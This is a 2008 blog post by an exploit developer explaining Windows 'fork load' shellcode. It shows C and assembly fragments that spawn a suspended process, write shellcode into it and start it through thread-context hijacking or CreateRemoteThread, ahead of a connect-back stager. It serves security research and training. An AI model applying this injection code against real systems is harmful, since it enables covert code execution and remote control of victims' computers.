Tuesday, August 5, 2008

An Apology for Forking Shellcode

*Note: To practice my writing, I will start writing random posts in English, most of them related to computers.*

I remember that back in the day, when Dave was trying to chill out after a hard day of work, he started on a simple "half an hour" hoolio (in Immunity slang, a hoolio is an exploit for bizarre software, named after the Julio FTP Server), and so he started on Savant. For those who have never exploited it: it takes a bit more than half an hour. Refer to Advanced Stack Overflow.


The last thing I did was fully port to CANVAS the neat exploit that Brett Moore did for SyScan. It's a really interesting bug and a good proof of concept for Windows 2003 exploitation (starting today, we are going to include it in the Heap Overflow training). I won't get into the details, since Brett covers them all; I just want to say that it is a nice bug and, with some work, it can be exploited quite reliably. This time the problem was different: shellcode.

The big problem with shellcode execution here is that the heap has been corrupted by whatever primitive you used, so the process will eventually crash on an allocation. The heap can be repaired, but you will never be 100% sure that you did it correctly, and you will probably end up with a big shellcode.

Our usual response to this problem is process injection. Bas (also known as the great Bas Alberts) wrote a great shellcode a couple of years ago that injects MOSDEF shellcode into a given process and executes the connect-back from there. Before he left, we tag-teamed a little on this exploit to reduce the shellcode size (I only had around 0x300 bytes).

I did all of this without checking the thread's privileges (kids, don't do this at home; we are security professionals trained to make such dumb mistakes), so when I ran my exploit, nothing significant happened.

Since I believe in science, I looked for the cause, and this time I found the worst: I didn't have SeDebugPrivilege. Usually it is present but disabled, and you can easily enable it with a couple of lines of assembly, but this time it was not there at all. In simple words:
Goodbye, injection shellcode; welcome, trouble.

Next step: ForkLoad shellcode. We had a template of what was supposed to be a fork shellcode, but it was never finished, so finishing it was my task for the last couple of days. (Sheesh, I did this whole write-up just to get to this point.)

In 2003, the Last Stage of Delirium group released a paper on Win32 shellcode in which, among other amazing tricks, they describe a Fork Load shellcode. They made it look simple:

1) Create the process in Suspended Mode

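STARTUPINFOA si = {0}; PROCESS_INFORMATION pi;
CONTEXT ctx;
si.cb = sizeof(si);  // STARTUPINFO must carry its own size
// 10 arguments: the original was missing lpCurrentDirectory (NULL)
CreateProcessA(NULL, "cmd", NULL, NULL, FALSE, CREATE_SUSPENDED, NULL, NULL, &si, &pi);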

2) Get the full context of the main thread

ctx.ContextFlags = CONTEXT_FULL;
GetThreadContext(pi.hThread, &ctx);

3) Allocate memory in the remote process with VirtualAllocEx and write our shellcode there.

LPVOID v = VirtualAllocEx(pi.hProcess, NULL, 0x5000, MEM_COMMIT | MEM_RESERVE, PAGE_EXECUTE_READWRITE);
WriteProcessMemory(pi.hProcess, v, buf, sizeof(buf), NULL);  // buf holds the shellcode

4) Point the thread's EIP at our shellcode

ctx.ContextFlags = CONTEXT_FULL;
ctx.Eip = (DWORD)v;  // 32-bit target
SetThreadContext(pi.hThread, &ctx);

5) Since the thread is suspended, resume its execution

ResumeThread(pi.hThread);


The injected shellcode will work perfectly as long as it does simple things. You will have kernel32.dll and ntdll.dll loaded (but not initialized), so depending on what your shellcode does, you might end up crashing on an uninitialized critical section or something similar.

To fix this, we have to make a couple of tweaks. Let me show you some code:

1) You need to distinguish whether you are the forking or the forked process; we did that with a simple piece of self-modifying code:

forkentry:
// if this marker is cleared this jmps to forkthis:
// we copy this entire payload over ;)
xorl %eax, %eax
incl %eax
test %eax,%eax
jz forkthis

// start of self modifying muck

// Self-modifying code: replace the incl with a nop
leal forkentry-getpcloc(%ebp),%ecx
movb $0x90, 2(%ecx) // 2(%ecx) points to the incl %eax

2) CreateProcess in suspended mode

CreateProcessA(NULL, "cmd", NULL, NULL, FALSE, CREATE_SUSPENDED, NULL, NULL, &si, &pi);

3) Allocate memory in the remote process with VirtualAllocEx and write our shellcode there.

LPVOID v = VirtualAllocEx(pi.hProcess, NULL, 0x5000, MEM_COMMIT | MEM_RESERVE, PAGE_EXECUTE_READWRITE);
WriteProcessMemory(pi.hProcess, v, buf, sizeof(buf), NULL);  // buf holds the shellcode

4) Get the full context of the main thread

ctx.ContextFlags = CONTEXT_FULL;
GetThreadContext(pi.hThread, &ctx);

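5) Create a remote thread that runs the copied shellcode

// start address is v, the remote copy written in step 3
CreateRemoteThread(pi.hProcess, NULL, 0, (LPTHREAD_START_ROUTINE)v, NULL, 0, NULL);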

6) Resume execution of the main thread.

// pi.hThread
pushl %esi
call RESUMETHREAD-getpcloc(%ebp)

7a) If you are the forking process, call ExitThread

xorl %eax,%eax
pushl %eax
call EXITTHREAD-getpcloc(%ebp)

7b) If you are the forked process, sleep for a while (0x1000 ms, about four seconds) to let the main thread initialize everything

kernel32.dll!Sleep( 0x1000)


All of that takes around 0x2cd bytes (717 bytes, inside the roughly 0x300 available; it can be optimized further), including:
- LoadLibrary("WS2_32.dll")
- Resolving WS2_32.dll!WSAStartup and calling it
- The first-stage MOSDEF shellcode (socket/connect/recv).


All the kudos go to Bas and his recent rewrite of our shellcode framework, which made this a much smoother experience.
